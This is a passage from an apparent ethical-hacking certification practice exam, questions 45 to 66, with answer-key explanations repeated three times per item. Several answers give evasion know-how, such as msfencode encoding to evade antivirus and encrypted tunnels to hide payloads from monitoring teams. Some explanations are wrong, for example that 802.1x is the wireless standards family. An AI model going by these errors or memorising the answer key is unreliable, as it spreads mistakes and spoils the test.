The use of WPA or WPA2 may have actually prevented the attack. A rogue access point was not the primary vulnerability exploited.
Incorrect
Correct Answer:
WEP is correct.
In 2007, WEP was well on its way out. WPA first became available in 2003, and security flaws in WEP were well known and easily exploitable. Per accounts written in the Wall Street Journal and ZDNet, T.J.Maxx’s parent company chose to secure its wireless network using Wired Equivalent Privacy (WEP), and used wireless to transmit data between price-checking devices, cash registers, and computers. Hackers broke the WEP encryption at a Minnesota storefront and collected information submitted by employees logging on to the company’s central database in Massachusetts, stealing usernames and passwords. Hackers then created their own user accounts, and the rest is history (the theft included millions of credit card numbers).
Incorrect Answers:
WPA, WPA2, and Rogue access points are incorrect.
The use of WPA or WPA2 may have actually prevented the attack. A rogue access point was not the primary vulnerability exploited.
Unattempted
Correct Answer:
WEP is correct.
In 2007, WEP was well on its way out. WPA first became available in 2003, and security flaws in WEP were well known and easily exploitable. Per accounts written in the Wall Street Journal and ZDNet, T.J.Maxx’s parent company chose to secure its wireless network using Wired Equivalent Privacy (WEP), and used wireless to transmit data between price-checking devices, cash registers, and computers. Hackers broke the WEP encryption at a Minnesota storefront and collected information submitted by employees logging on to the company’s central database in Massachusetts, stealing usernames and passwords. Hackers then created their own user accounts, and the rest is history (the theft included millions of credit card numbers).
Incorrect Answers:
WPA, WPA2, and Rogue access points are incorrect.
The use of WPA or WPA2 may have actually prevented the attack. A rogue access point was not the primary vulnerability exploited.
Question 46 of 80
46. Question
Amazon’s EC2 provides virtual machines that can be controlled through a service API. Which of the following best defines this service?
Correct
Correct Answer:
IaaS is correct.
Amazon’s EC2 provides resizable compute capacity in the cloud via VMs that can be controlled via an API, thus fitting the definition of IaaS.
Incorrect Answers:
PaaS, SaaS, and Public are incorrect.
These do not match the Amazon EC2 service description.
Incorrect
Correct Answer:
IaaS is correct.
Amazon’s EC2 provides resizable compute capacity in the cloud via VMs that can be controlled via an API, thus fitting the definition of IaaS.
Incorrect Answers:
PaaS, SaaS, and Public are incorrect.
These do not match the Amazon EC2 service description.
Unattempted
Correct Answer:
IaaS is correct.
Amazon’s EC2 provides resizable compute capacity in the cloud via VMs that can be controlled via an API, thus fitting the definition of IaaS.
Incorrect Answers:
PaaS, SaaS, and Public are incorrect.
These do not match the Amazon EC2 service description.
Question 47 of 80
47. Question
Which of the following SIDs captured during a test represents the true administrator account on a Windows machine?
Correct
Correct Answer:
S-1-5-21-1374882321-2871566290-774930401-500 is correct.
The security identifier is used to identify a security principal and is unique to each account and service. In a Windows system, the true administrator account always has a relative identifier (RID) of 500—shown at the tail end of the SID.
Incorrect Answers:
S-1-5-21-1374882321-2871566290-774930401-1100, S-1-5-21-1374882321-2871566290-774930401-1101, and S-1-5-21-1374882321-2871566290-774930401-501are incorrect.
RID values between 1000 and 1500 indicate a standard user account. The RID 501 indicates the guest account.
Incorrect
Correct Answer:
S-1-5-21-1374882321-2871566290-774930401-500 is correct.
The security identifier is used to identify a security principal and is unique to each account and service. In a Windows system, the true administrator account always has a relative identifier (RID) of 500—shown at the tail end of the SID.
Incorrect Answers:
S-1-5-21-1374882321-2871566290-774930401-1100, S-1-5-21-1374882321-2871566290-774930401-1101, and S-1-5-21-1374882321-2871566290-774930401-501are incorrect.
RID values between 1000 and 1500 indicate a standard user account. The RID 501 indicates the guest account.
Unattempted
Correct Answer:
S-1-5-21-1374882321-2871566290-774930401-500 is correct.
The security identifier is used to identify a security principal and is unique to each account and service. In a Windows system, the true administrator account always has a relative identifier (RID) of 500—shown at the tail end of the SID.
Incorrect Answers:
S-1-5-21-1374882321-2871566290-774930401-1100, S-1-5-21-1374882321-2871566290-774930401-1101, and S-1-5-21-1374882321-2871566290-774930401-501are incorrect.
RID values between 1000 and 1500 indicate a standard user account. The RID 501 indicates the guest account.
Question 48 of 80
48. Question
Which of the following Metasploit framework tools can assist a pen tester in evading AV systems?
Correct
Correct Answer:
msfencode is correct.
Msfencode allows the tester to encode the payload. In other words, you can change the way it appears to an AV system. The following is from Offensive Security’s site: “Most of the time, one cannot simply use shellcode generated straight out of msfpayload. It needs to be encoded to suit the target in order to function properly. This can mean transforming your shellcode into pure alphanumeric, getting rid of bad characters or encoding it for 64 bit target.”
Incorrect Answers:
msfcli, msfpayload, and msfd are incorrect.
These do not address evasion.
Incorrect
Correct Answer:
msfencode is correct.
Msfencode allows the tester to encode the payload. In other words, you can change the way it appears to an AV system. The following is from Offensive Security’s site: “Most of the time, one cannot simply use shellcode generated straight out of msfpayload. It needs to be encoded to suit the target in order to function properly. This can mean transforming your shellcode into pure alphanumeric, getting rid of bad characters or encoding it for 64 bit target.”
Incorrect Answers:
msfcli, msfpayload, and msfd are incorrect.
These do not address evasion.
Unattempted
Correct Answer:
msfencode is correct.
Msfencode allows the tester to encode the payload. In other words, you can change the way it appears to an AV system. The following is from Offensive Security’s site: “Most of the time, one cannot simply use shellcode generated straight out of msfpayload. It needs to be encoded to suit the target in order to function properly. This can mean transforming your shellcode into pure alphanumeric, getting rid of bad characters or encoding it for 64 bit target.”
Incorrect Answers:
msfcli, msfpayload, and msfd are incorrect.
These do not address evasion.
Question 49 of 80
49. Question
Which of the following attacks injects parameters into a connection string using semicolons as separators?
Correct
Correct Answer:
CSPP is correct.
Originally highlighted at a BlackHat conference back in 2010 (www.blackhat.com), the connection string parameter pollution (CSPP) attack can be used to steal user identities and hijack web credentials. CSPP is a high-risk attack because of the relative ease with which it can be carried out and the potential results it can have.
Incorrect Answers:
XSS, CSRF, and SQL injection are incorrect.
These choices do not accurately reflect the method(s) used in this attack.
Incorrect
Correct Answer:
CSPP is correct.
Originally highlighted at a BlackHat conference back in 2010 (www.blackhat.com), the connection string parameter pollution (CSPP) attack can be used to steal user identities and hijack web credentials. CSPP is a high-risk attack because of the relative ease with which it can be carried out and the potential results it can have.
Incorrect Answers:
XSS, CSRF, and SQL injection are incorrect.
These choices do not accurately reflect the method(s) used in this attack.
Unattempted
Correct Answer:
CSPP is correct.
Originally highlighted at a BlackHat conference back in 2010 (www.blackhat.com), the connection string parameter pollution (CSPP) attack can be used to steal user identities and hijack web credentials. CSPP is a high-risk attack because of the relative ease with which it can be carried out and the potential results it can have.
Incorrect Answers:
XSS, CSRF, and SQL injection are incorrect.
These choices do not accurately reflect the method(s) used in this attack.
Question 50 of 80
50. Question
During investigation of system security, you discover the HttpOnly flag is set in cookies. Which of the following is most likely being mitigated by this attempt?
Correct
Correct Answer:
XSS is correct. Of the answers provided, XSS is the only one that makes sense. This setting prevents cookies from being accessible by a client-side script.
Incorrect Answers:
CSRF, CSPP, and Buffer overflow are incorrect.
Cross-site request forgery (CSRF) tricks a user (usually by phishing) into visiting a malicious website, while the user has an active, authenticated session with a trusted website (the malicious website can then instruct the user’s web browser to send a request to the target website).
CSPP (connection string parameter pollution) is an injection attack that takes advantage of web applications using semicolons to separate parameters in database communication.
Buffer overflow has absolutely nothing to do with this question.
Incorrect
Correct Answer:
XSS is correct. Of the answers provided, XSS is the only one that makes sense. This setting prevents cookies from being accessible by a client-side script.
Incorrect Answers:
CSRF, CSPP, and Buffer overflow are incorrect.
Cross-site request forgery (CSRF) tricks a user (usually by phishing) into visiting a malicious website, while the user has an active, authenticated session with a trusted website (the malicious website can then instruct the user’s web browser to send a request to the target website).
CSPP (connection string parameter pollution) is an injection attack that takes advantage of web applications using semicolons to separate parameters in database communication.
Buffer overflow has absolutely nothing to do with this question.
Unattempted
Correct Answer:
XSS is correct. Of the answers provided, XSS is the only one that makes sense. This setting prevents cookies from being accessible by a client-side script.
Incorrect Answers:
CSRF, CSPP, and Buffer overflow are incorrect.
Cross-site request forgery (CSRF) tricks a user (usually by phishing) into visiting a malicious website, while the user has an active, authenticated session with a trusted website (the malicious website can then instruct the user’s web browser to send a request to the target website).
CSPP (connection string parameter pollution) is an injection attack that takes advantage of web applications using semicolons to separate parameters in database communication.
Buffer overflow has absolutely nothing to do with this question.
Question 51 of 80
51. Question
Which of the following statements best describes the term “likelihood” in regard to risk management?
Correct
Correct answer:
Likelihood is the probability that a threat will exploit a particular vulnerability is correct.
Risk management is filled with terms like “threat,” “exposure,” “residual,” and tons of others. Likelihood is the probability that a threat (sometimes referred to as a threat source or a threat agent) will exploit a particular vulnerability. For example, a grizzly bear is a threat to my laptop, but the likelihood of one barreling through my window and destroying my system is really low.
Incorrect answers:
Likelihood is the possibility risk exists in the environment, Likelihood is the possibility of a threat existing, and Likelihood is the probability of a risk exploiting a threat are incorrect.
None of the other answers correctly describes likelihood.
Incorrect
Correct answer:
Likelihood is the probability that a threat will exploit a particular vulnerability is correct.
Risk management is filled with terms like “threat,” “exposure,” “residual,” and tons of others. Likelihood is the probability that a threat (sometimes referred to as a threat source or a threat agent) will exploit a particular vulnerability. For example, a grizzly bear is a threat to my laptop, but the likelihood of one barreling through my window and destroying my system is really low.
Incorrect answers:
Likelihood is the possibility risk exists in the environment, Likelihood is the possibility of a threat existing, and Likelihood is the probability of a risk exploiting a threat are incorrect.
None of the other answers correctly describes likelihood.
Unattempted
Correct answer:
Likelihood is the probability that a threat will exploit a particular vulnerability is correct.
Risk management is filled with terms like “threat,” “exposure,” “residual,” and tons of others. Likelihood is the probability that a threat (sometimes referred to as a threat source or a threat agent) will exploit a particular vulnerability. For example, a grizzly bear is a threat to my laptop, but the likelihood of one barreling through my window and destroying my system is really low.
Incorrect answers:
Likelihood is the possibility risk exists in the environment, Likelihood is the possibility of a threat existing, and Likelihood is the probability of a risk exploiting a threat are incorrect.
None of the other answers correctly describes likelihood.
Question 52 of 80
52. Question
An organization implements an access control system that allows the data owner to set security permissions on an object. Which of the following best describes this?
Correct
Correct Answer:
Discretionary access control is correct.
Discretionary access control (DAC) is a system allowing the data owner to set security permissions for the object. If you’re on a Windows machine right now, you can create files and folders and then set sharing and permissions on them as you see fit.
Incorrect Answers:
Mandatory access control (MAC) assigns sensitivity labels to data and controls access by matching the user’s security level to the resource label.
RBAC can use either DAC or MAC to get the job done. The goal is to assign a role, and any entity holding that role can perform the duties associated with it. Users are not assigned permissions directly; they acquire them through their role (or roles).
The term authorized access control does not exist.
Incorrect
Correct Answer:
Discretionary access control is correct.
Discretionary access control (DAC) is a system allowing the data owner to set security permissions for the object. If you’re on a Windows machine right now, you can create files and folders and then set sharing and permissions on them as you see fit.
Incorrect Answers:
Mandatory access control (MAC) assigns sensitivity labels to data and controls access by matching the user’s security level to the resource label.
RBAC can use either DAC or MAC to get the job done. The goal is to assign a role, and any entity holding that role can perform the duties associated with it. Users are not assigned permissions directly; they acquire them through their role (or roles).
The term authorized access control does not exist.
Unattempted
Correct Answer:
Discretionary access control is correct.
Discretionary access control (DAC) is a system allowing the data owner to set security permissions for the object. If you’re on a Windows machine right now, you can create files and folders and then set sharing and permissions on them as you see fit.
Incorrect Answers:
Mandatory access control (MAC) assigns sensitivity labels to data and controls access by matching the user’s security level to the resource label.
RBAC can use either DAC or MAC to get the job done. The goal is to assign a role, and any entity holding that role can perform the duties associated with it. Users are not assigned permissions directly; they acquire them through their role (or roles).
The term authorized access control does not exist.
Question 53 of 80
53. Question
Which of the following is the least likely step you should take in recovering from a malware infection?
Correct
Correct Answer:
Back up the hard drive is correct.
Backing up a hard drive when you know there’s an infection makes as much sense as putting sugar on your grits. It’s a horrible idea and just doesn’t work. Why copy the malware?
Incorrect Answers:
Delete system restore points, Remove the system from the corporate network, and Reinstall the OS from original media are incorrect.
Deleting restore points is a good idea because you don’t know when you were infected. Removing the system from the network makes obvious sense, as does restoring the OS from original media. Be careful with any backup restoration—you must ensure the backups are clean before reusing.
Incorrect
Correct Answer:
Back up the hard drive is correct.
Backing up a hard drive when you know there’s an infection makes as much sense as putting sugar on your grits. It’s a horrible idea and just doesn’t work. Why copy the malware?
Incorrect Answers:
Delete system restore points, Remove the system from the corporate network, and Reinstall the OS from original media are incorrect.
Deleting restore points is a good idea because you don’t know when you were infected. Removing the system from the network makes obvious sense, as does restoring the OS from original media. Be careful with any backup restoration—you must ensure the backups are clean before reusing.
Unattempted
Correct Answer:
Back up the hard drive is correct.
Backing up a hard drive when you know there’s an infection makes as much sense as putting sugar on your grits. It’s a horrible idea and just doesn’t work. Why copy the malware?
Incorrect Answers:
Delete system restore points, Remove the system from the corporate network, and Reinstall the OS from original media are incorrect.
Deleting restore points is a good idea because you don’t know when you were infected. Removing the system from the network makes obvious sense, as does restoring the OS from original media. Be careful with any backup restoration—you must ensure the backups are clean before reusing.
Question 54 of 80
54. Question
Which nmap script helps with detection of potentially risky HTTP methods?
Correct
Correct answer:
http-methods is correct.
The following is from nmap.org regarding the script: “Finds out what options are supported by an HTTP server by sending an OPTIONS request. Lists potentially risky methods. It tests those methods not mentioned in the OPTIONS headers individually and sees if they are implemented. Any output other than 501/405 suggests that the method is if not in the range 400 to 600…. In this script, ‘potentially risky’ methods are anything except GET, HEAD, POST, and OPTIONS. If the script reports potentially risky methods, they may not all be security risks, but you should check to make sure.”
Incorrect answers:
http enum, http-get, and http-headers are incorrect.
These are not scripts in nmap to show HTTP methods.
Incorrect
Correct answer:
http-methods is correct.
The following is from nmap.org regarding the script: “Finds out what options are supported by an HTTP server by sending an OPTIONS request. Lists potentially risky methods. It tests those methods not mentioned in the OPTIONS headers individually and sees if they are implemented. Any output other than 501/405 suggests that the method is if not in the range 400 to 600…. In this script, ‘potentially risky’ methods are anything except GET, HEAD, POST, and OPTIONS. If the script reports potentially risky methods, they may not all be security risks, but you should check to make sure.”
Incorrect answers:
http enum, http-get, and http-headers are incorrect.
These are not scripts in nmap to show HTTP methods.
Unattempted
Correct answer:
http-methods is correct.
The following is from nmap.org regarding the script: “Finds out what options are supported by an HTTP server by sending an OPTIONS request. Lists potentially risky methods. It tests those methods not mentioned in the OPTIONS headers individually and sees if they are implemented. Any output other than 501/405 suggests that the method is if not in the range 400 to 600…. In this script, ‘potentially risky’ methods are anything except GET, HEAD, POST, and OPTIONS. If the script reports potentially risky methods, they may not all be security risks, but you should check to make sure.”
Incorrect answers:
http enum, http-get, and http-headers are incorrect.
These are not scripts in nmap to show HTTP methods.
Question 55 of 80
55. Question
Which of the following statements are true regarding active sniffing? (Choose all that apply.)
Correct
Correct Answer:
Active sniffing is used when you are on a switch and Active sniffing is easier to detect than passive sniffing are correct.
If you’re connected to a switch, you’re on your own collision domain—meaning you’ll only see traffic intended for your port. Active sniffing is typically required in order to force the switch to send you other traffic to sniff. Active attacks, by their nature, are easier to detect—you’re actively injecting packets to make your sniffing efforts successful; therefore, there’s something to see.
Incorrect answers:
Active sniffing is used when you are on a hub and Active sniffing is harder to detect than passive sniffing are incorrect.
Hubs share a collision domain, so passive sniffing is all that’s necessary. And it’s worlds more difficult to detect a passive sniffer—after all, they’re just sitting there doing nothing but listening.
Incorrect
Correct Answer:
Active sniffing is used when you are on a switch and Active sniffing is easier to detect than passive sniffing are correct.
If you’re connected to a switch, you’re on your own collision domain—meaning you’ll only see traffic intended for your port. Active sniffing is typically required in order to force the switch to send you other traffic to sniff. Active attacks, by their nature, are easier to detect—you’re actively injecting packets to make your sniffing efforts successful; therefore, there’s something to see.
Incorrect answers:
Active sniffing is used when you are on a hub and Active sniffing is harder to detect than passive sniffing are incorrect.
Hubs share a collision domain, so passive sniffing is all that’s necessary. And it’s worlds more difficult to detect a passive sniffer—after all, they’re just sitting there doing nothing but listening.
Unattempted
Correct Answer:
Active sniffing is used when you are on a switch and Active sniffing is easier to detect than passive sniffing are correct.
If you’re connected to a switch, you’re on your own collision domain—meaning you’ll only see traffic intended for your port. Active sniffing is typically required in order to force the switch to send you other traffic to sniff. Active attacks, by their nature, are easier to detect—you’re actively injecting packets to make your sniffing efforts successful; therefore, there’s something to see.
Incorrect answers:
Active sniffing is used when you are on a hub and Active sniffing is harder to detect than passive sniffing are incorrect.
Hubs share a collision domain, so passive sniffing is all that’s necessary. And it’s worlds more difficult to detect a passive sniffer—after all, they’re just sitting there doing nothing but listening.
Question 56 of 80
56. Question
Bart is working on a business impact assessment (BIA) and performs calculations on various systems to place value on them. On a certain server he discovers the following: • The server costs $2500 to purchase. • The server typically fails once every five years. • The salary for the repair technician to restore a server after failure is $40 an hour, and it typically takes two hours to fully restore a server. • The accounting group has five employees paid $25 an hour who are at a standstill during an outage. What is the ALE for the server?
Correct
Correct answer:
$566 is correct.
ALE = ARO × SLE. To find the correct annualized loss expectancy, multiply the percentage of time it is likely to occur annually (annual rate of occurrence, in this case 0.2, or 1 failure / 5 years = 20%) by the amount of cost incurred from a single failure (single loss expectancy [in this case, $80 for the repair guy] + $250 [5 employees at $25 an hour for 2 hours] + $2500 [replacement of the server] = $2830). ALE = 0.2 × $2830, so the ALE in this case is $566.
Incorrect answers:
20% is the ARO for this scenario (1 failure / 5 years).
$2830 is the SLE for this scenario (repair guy cost + lost work from accounting guys + replacement of server, or $80 + $250 + $2,500).
$500 would be the ALE if you did not take into account the technician and lost work production.
Incorrect
Correct answer:
$566 is correct.
ALE = ARO × SLE. To find the correct annualized loss expectancy, multiply the percentage of time it is likely to occur annually (annual rate of occurrence, in this case 0.2, or 1 failure / 5 years = 20%) by the amount of cost incurred from a single failure (single loss expectancy [in this case, $80 for the repair guy] + $250 [5 employees at $25 an hour for 2 hours] + $2500 [replacement of the server] = $2830). ALE = 0.2 × $2830, so the ALE in this case is $566.
Incorrect answers:
20% is the ARO for this scenario (1 failure / 5 years).
$2830 is the SLE for this scenario (repair guy cost + lost work from accounting guys + replacement of server, or $80 + $250 + $2,500).
$500 would be the ALE if you did not take into account the technician and lost work production.
Unattempted
Correct answer:
$566 is correct.
ALE = ARO × SLE. To find the correct annualized loss expectancy, multiply the percentage of time it is likely to occur annually (annual rate of occurrence, in this case 0.2, or 1 failure / 5 years = 20%) by the amount of cost incurred from a single failure (single loss expectancy [in this case, $80 for the repair guy] + $250 [5 employees at $25 an hour for 2 hours] + $2500 [replacement of the server] = $2830). ALE = 0.2 × $2830, so the ALE in this case is $566.
Incorrect answers:
20% is the ARO for this scenario (1 failure / 5 years).
$2830 is the SLE for this scenario (repair guy cost + lost work from accounting guys + replacement of server, or $80 + $250 + $2,500).
$500 would be the ALE if you did not take into account the technician and lost work production.
Question 57 of 80
57. Question
You are performing an ACK scan against a network from an external location. You’ve identified two web servers on the DMZ subnet and notice that they are responding to the ACK scan. Which of the following best describes the situation?
Correct
Correct answer:
The firewall for the DMZ subnet is not performing stateful inspection is correct. A stateful inspection firewall would notice the ACK coming unsolicited and from the wrong side of the fence.
Incorrect answers:
They are both IIS servers, They are both Apache servers, and The IDS is not functioning for the DMZ subnet are incorrect.
There is no way to tell, from the information provided, what type of web server is responding.
The IDS is passive/reactive and would not prevent the packet flow anyway.
Incorrect
Correct answer:
The firewall for the DMZ subnet is not performing stateful inspection is correct. A stateful inspection firewall would notice the ACK coming unsolicited and from the wrong side of the fence.
Incorrect answers:
They are both IIS servers, They are both Apache servers, and The IDS is not functioning for the DMZ subnet are incorrect.
There is no way to tell, from the information provided, what type of web server is responding.
The IDS is passive/reactive and would not prevent the packet flow anyway.
Unattempted
Correct answer:
The firewall for the DMZ subnet is not performing stateful inspection is correct. A stateful inspection firewall would notice the ACK coming unsolicited and from the wrong side of the fence.
Incorrect answers:
They are both IIS servers, They are both Apache servers, and The IDS is not functioning for the DMZ subnet are incorrect.
There is no way to tell, from the information provided, what type of web server is responding.
The IDS is passive/reactive and would not prevent the packet flow anyway.
Question 58 of 80
58. Question
You send an e-mail to an address inside the target organization; however, you purposefully misspell the address to ensure it will not go to an existing mailbox. Which of the following is the best reason for doing this?
Correct
Correct Answer:
To reveal information about the target’s e-mail servers is correct. If you purposefully send an e-mail to an address you know is not valid, the servers at your target take a look at the address and decide what to do with it. This effort can elicit a response that can provide insight into e-mail handling.
Incorrect Answers:
To test the target’s antivirus solution, To test the target’s spam filters, and To reveal information about the e-mail administrator’s root access are incorrect. This effort is definitely not testing the AV systems of the target, and testing the spam filter would usually require a valid e-mail address to send to.
Incorrect
Correct Answer:
To reveal information about the target’s e-mail servers is correct. If you purposefully send an e-mail to an address you know is not valid, the servers at your target take a look at the address and decide what to do with it. This effort can elicit a response that can provide insight into e-mail handling.
Incorrect Answers:
To test the target’s antivirus solution, To test the target’s spam filters, and To reveal information about the e-mail administrator’s root access are incorrect. This effort is definitely not testing the AV systems of the target, and testing the spam filter would usually require a valid e-mail address to send to.
Unattempted
Correct Answer:
To reveal information about the target’s e-mail servers is correct. If you purposefully send an e-mail to an address you know is not valid, the servers at your target take a look at the address and decide what to do with it. This effort can elicit a response that can provide insight into e-mail handling.
Incorrect Answers:
To test the target’s antivirus solution, To test the target’s spam filters, and To reveal information about the e-mail administrator’s root access are incorrect. This effort is definitely not testing the AV systems of the target, and testing the spam filter would usually require a valid e-mail address to send to.
Question 59 of 80
59. Question
You start traceroute from your system to a remote machine. Which of the following statements is true regarding your attempt?
Correct
Correct answer:
The first ICMP packet leaving your machine has a hop count of 1is correct.
Traceroute works by incrementing the TTL on each packet it sends by 1 after each hop is hit and returns, thus ensuring the response comes back explicitly from that hop and returns its name and IP address. Thus, TTL is set to 1 for the first round, then incremented to 2 for the next, and so on.
Incorrect answers:
The first ICMP packet leaving your machine has a hop count of 0, The first ICMP packet leaving your machine has an unlimited hop count, and The first ICMP packet leaving your machine carries a hello packet in the payload are incorrect.
These answers do not represent how traceroute works.
Incorrect
Correct answer:
The first ICMP packet leaving your machine has a hop count of 1is correct.
Traceroute works by incrementing the TTL on each packet it sends by 1 after each hop is hit and returns, thus ensuring the response comes back explicitly from that hop and returns its name and IP address. Thus, TTL is set to 1 for the first round, then incremented to 2 for the next, and so on.
Incorrect answers:
The first ICMP packet leaving your machine has a hop count of 0, The first ICMP packet leaving your machine has an unlimited hop count, and The first ICMP packet leaving your machine carries a hello packet in the payload are incorrect.
These answers do not represent how traceroute works.
Unattempted
Correct answer:
The first ICMP packet leaving your machine has a hop count of 1is correct.
Traceroute works by incrementing the TTL on each packet it sends by 1 after each hop is hit and returns, thus ensuring the response comes back explicitly from that hop and returns its name and IP address. Thus, TTL is set to 1 for the first round, then incremented to 2 for the next, and so on.
Incorrect answers:
The first ICMP packet leaving your machine has a hop count of 0, The first ICMP packet leaving your machine has an unlimited hop count, and The first ICMP packet leaving your machine carries a hello packet in the payload are incorrect.
These answers do not represent how traceroute works.
Question 60 of 80
60. Question
An attacker leverages IoT vulnerabilities to shut off the air conditioning on the data floor, causing a major disruption. What is this attack called?
Correct
Correct Answer:
HVAC attack is correct.
Yes, this is really what it’s called. No, I’m not making it up. An HVAC attack takes place when one hacks IoT devices in order to shut down air conditioning services.
Incorrect Answers:
Although SCADA may have appealed to you here, it’s incorrect in this scenario (SCADA and IoT don’t necessarily have anything to do with one another).
A DoS may have occurred here, but there’s no specific indication it occurred.
Zigbeez doesn’t exist.
Incorrect
Correct Answer:
HVAC attack is correct.
Yes, this is really what it’s called. No, I’m not making it up. An HVAC attack takes place when one hacks IoT devices in order to shut down air conditioning services.
Incorrect Answers:
Although SCADA may have appealed to you here, it’s incorrect in this scenario (SCADA and IoT don’t necessarily have anything to do with one another).
A DoS may have occurred here, but there’s no specific indication it occurred.
Zigbeez doesn’t exist.
Unattempted
Correct Answer:
HVAC attack is correct.
Yes, this is really what it’s called. No, I’m not making it up. An HVAC attack takes place when one hacks IoT devices in order to shut down air conditioning services.
Incorrect Answers:
Although SCADA may have appealed to you here, it’s incorrect in this scenario (SCADA and IoT don’t necessarily have anything to do with one another).
A DoS may have occurred here, but there’s no specific indication it occurred.
Zigbeez doesn’t exist.
Question 61 of 80
61. Question
You are performing reconnaissance on a target and want to see domain name registration contact information. Which of the following is your best choice?
Correct
Correct answer:
Whois is correct.
Whois provides information on registrants—technical POCs, who registered the domain, contact numbers, and so on.
Incorrect answers:
CAPTCHA is a means to distinguish human from machine input, where a text entry or a picture identification requires a real human to click or enter it.
IANA regulates IP allocation, and IETF is a standards organization.
Incorrect
Correct answer:
Whois is correct.
Whois provides information on registrants—technical POCs, who registered the domain, contact numbers, and so on.
Incorrect answers:
CAPTCHA is a means to distinguish human from machine input, where a text entry or a picture identification requires a real human to click or enter it.
IANA regulates IP allocation, and IETF is a standards organization.
Unattempted
Correct answer:
Whois is correct.
Whois provides information on registrants—technical POCs, who registered the domain, contact numbers, and so on.
Incorrect answers:
CAPTCHA is a means to distinguish human from machine input, where a text entry or a picture identification requires a real human to click or enter it.
IANA regulates IP allocation, and IETF is a standards organization.
Question 62 of 80
62. Question
A pen tester wants to deliver a payload to a target inside the organization without alerting any monitoring teams. A peer recommends session splicing as an option for IDS evasion. If the pen tester has access to the target already, which of the following methods represents another possible option?
Correct
Correct Answer:
Encrypt the traffic between you and the host is correct.
Assuming you can set up encryption between the target host and the attacking machine, this is the best option. Encryption hides everything from view; therefore, the IDS and those pesky security teams monitoring the perimeter won’t see the traffic. Could an encrypted tunnel in and out of the boundary alert? Perhaps—so don’t leave it up long.
Incorrect Answers:
Starting a fake attack to draw attention away can definitely provide cover fire and is a great technique in the real world; however, by design it alerts the security team, so it’s not apropos here.
Session hijacking doesn’t apply in this situation.
A connection between the target host and the attacking machine does not mean the IDS and monitoring teams turn a blind eye.
Incorrect
Correct Answer:
Encrypt the traffic between you and the host is correct.
Assuming you can set up encryption between the target host and the attacking machine, this is the best option. Encryption hides everything from view; therefore, the IDS and those pesky security teams monitoring the perimeter won’t see the traffic. Could an encrypted tunnel in and out of the boundary alert? Perhaps—so don’t leave it up long.
Incorrect Answers:
Starting a fake attack to draw attention away can definitely provide cover fire and is a great technique in the real world; however, by design it alerts the security team, so it’s not apropos here.
Session hijacking doesn’t apply in this situation.
A connection between the target host and the attacking machine does not mean the IDS and monitoring teams turn a blind eye.
Unattempted
Correct Answer:
Encrypt the traffic between you and the host is correct.
Assuming you can set up encryption between the target host and the attacking machine, this is the best option. Encryption hides everything from view; therefore, the IDS and those pesky security teams monitoring the perimeter won’t see the traffic. Could an encrypted tunnel in and out of the boundary alert? Perhaps—so don’t leave it up long.
Incorrect Answers:
Starting a fake attack to draw attention away can definitely provide cover fire and is a great technique in the real world; however, by design it alerts the security team, so it’s not apropos here.
Session hijacking doesn’t apply in this situation.
A connection between the target host and the attacking machine does not mean the IDS and monitoring teams turn a blind eye.
Question 63 of 80
63. Question
Which of the following best describes the amount of risk that remains after mitigation efforts to correct a vulnerability have been taken?
Correct
Correct Answer:
Residual is correct.
Residual risk is that which remains after your fix efforts have been completed.
Incorrect Answers:
Inherent risk is that which is currently there—inherited from the current situation and circumstances.
Deferred risk is risk you wish to deal with later.
Impartial is a distractor.
Incorrect
Correct Answer:
Residual is correct.
Residual risk is that which remains after your fix efforts have been completed.
Incorrect Answers:
Inherent risk is that which is currently there—inherited from the current situation and circumstances.
Deferred risk is risk you wish to deal with later.
Impartial is a distractor.
Unattempted
Correct Answer:
Residual is correct.
Residual risk is that which remains after your fix efforts have been completed.
Incorrect Answers:
Inherent risk is that which is currently there—inherited from the current situation and circumstances.
Deferred risk is risk you wish to deal with later.
Impartial is a distractor.
Question 64 of 80
64. Question
Which of the following describes a vulnerability allowing attackers to execute concatenated commands in bash?
Correct
Correct Answer:
Shellshock is correct.
Shellshock works by causing Bash to unintentionally execute commands when the commands are concatenated (usually via CGI) to the end of function definitions stored in the values of environment variables.
Incorrect Answers:
WannaCry, POODLE, and Heartbleed are incorrect.
These vulnerabilities do not match the described condition.
Incorrect
Correct Answer:
Shellshock is correct.
Shellshock works by causing Bash to unintentionally execute commands when the commands are concatenated (usually via CGI) to the end of function definitions stored in the values of environment variables.
Incorrect Answers:
WannaCry, POODLE, and Heartbleed are incorrect.
These vulnerabilities do not match the described condition.
Unattempted
Correct Answer:
Shellshock is correct.
Shellshock works by causing Bash to unintentionally execute commands when the commands are concatenated (usually via CGI) to the end of function definitions stored in the values of environment variables.
Incorrect Answers:
WannaCry, POODLE, and Heartbleed are incorrect.
These vulnerabilities do not match the described condition.
Question 65 of 80
65. Question
In which phase of a pen test is scanning performed?
Correct
Correct Answer:
Pre-attack is correct.
Pen tests have pre-attack, attack, and post-attack phases. Scanning takes place in the pre-attack phase.
Incorrect Answers:
Scanning does not take place in the attack or post-attack phase.
Reconnaissance is a distractor in this case.
Incorrect
Correct Answer:
Pre-attack is correct.
Pen tests have pre-attack, attack, and post-attack phases. Scanning takes place in the pre-attack phase.
Incorrect Answers:
Scanning does not take place in the attack or post-attack phase.
Reconnaissance is a distractor in this case.
Unattempted
Correct Answer:
Pre-attack is correct.
Pen tests have pre-attack, attack, and post-attack phases. Scanning takes place in the pre-attack phase.
Incorrect Answers:
Scanning does not take place in the attack or post-attack phase.
Reconnaissance is a distractor in this case.
Question 66 of 80
66. Question
Which of the following provides the integrity method for WPA2?
Correct
Correct Answer:
CCMP is correct.
As good as WPA was, there were tiny flaws to be exploited in TKIP. Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) was created to fix those and is the integrity method used by Wi-Fi Protected Access 2 (WPA2).
Incorrect Answers:
RC4, AES, and 802.1x are incorrect.
RC4 and AES are encryption algorithms (AES is used in WPA, by the way). 802.1x is the standards family wireless comes from.
Incorrect
Correct Answer:
CCMP is correct.
As good as WPA was, there were tiny flaws to be exploited in TKIP. Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) was created to fix those and is the integrity method used by Wi-Fi Protected Access 2 (WPA2).
Incorrect Answers:
RC4, AES, and 802.1x are incorrect.
RC4 and AES are encryption algorithms (AES is used in WPA, by the way). 802.1x is the standards family wireless comes from.
Unattempted
Correct Answer:
CCMP is correct.
As good as WPA was, there were tiny flaws to be exploited in TKIP. Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) was created to fix those and is the integrity method used by Wi-Fi Protected Access 2 (WPA2).
Incorrect Answers:
RC4, AES, and 802.1x are incorrect.
